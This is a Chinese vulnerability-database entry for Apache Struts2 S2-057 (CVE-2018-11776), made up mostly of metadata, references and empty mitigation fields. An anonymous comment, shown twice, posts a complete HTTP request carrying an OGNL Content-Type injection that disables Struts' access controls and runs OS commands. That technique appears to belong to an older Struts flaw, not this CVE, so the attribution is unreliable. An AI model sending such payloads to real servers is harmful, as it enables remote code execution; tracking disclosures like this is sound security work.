Apache Struts2 S2-057(CVE-2018-11776)

基本字段

漏洞编号：: SSV-97497

披露/发现时间：: 未知

提交时间：: 2018-08-22

漏洞等级：

漏洞类别：: 命令执行

影响组件：: Apache Struts
(影响版本较多,点击查看)

漏洞作者：: Man Yue Mo

提交者：: Knownsec

CVE-ID：: CVE-2018-11776

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

https://cwiki.apache.org/confluence/display/WW/S2-057

漏洞详情

贡献者共获得 0KB

共 0 兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 Knownsec 共获得 0KB

暂未开放

共 0 兑换

参考链接

https://cwiki.apache.org/confluence/display/WW/S2-057

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

防护方案

暂无防护方案

zy66 关注了该漏洞
M茗关注了该漏洞
Samael 关注了该漏洞
None 关注了该漏洞
匿名参与了评论
linglong0523 关注了该漏洞
9eek 关注了该漏洞
UnCarryY 关注了该漏洞
None 关注了该漏洞
匿名参与了评论
racobox 关注了该漏洞

生命线

Man Yue Mo

发现/披露了漏洞
Knownsec

2018-08-22 提交了漏洞
Knownsec

2018-08-22 提交补充了漏洞详情
2018-08-22 补充了漏洞详情
Knownsec

2018-08-23 提交更新了 PoC
2018-08-23 更新了哮天犬

相关漏洞

全部评论 (2)

匿名 2018-08-25

GET /index.action HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) Accept: */* Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows--2017'}:{'/bin/bash','-c','echo linux--2017'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Host: 127.0.0.1:8080 Connection: Keep-Alive
回复 0 0
2F
匿名 2018-08-23

where is POC ?
回复 1 0
1F

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

匿名 2018-08-25

GET /index.action HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) Accept: */* Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows--2017'}:{'/bin/bash','-c','echo linux--2017'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Host: 127.0.0.1:8080 Connection: Keep-Alive

回复 0 0

匿名 2018-08-23

where is POC ?

回复 1 0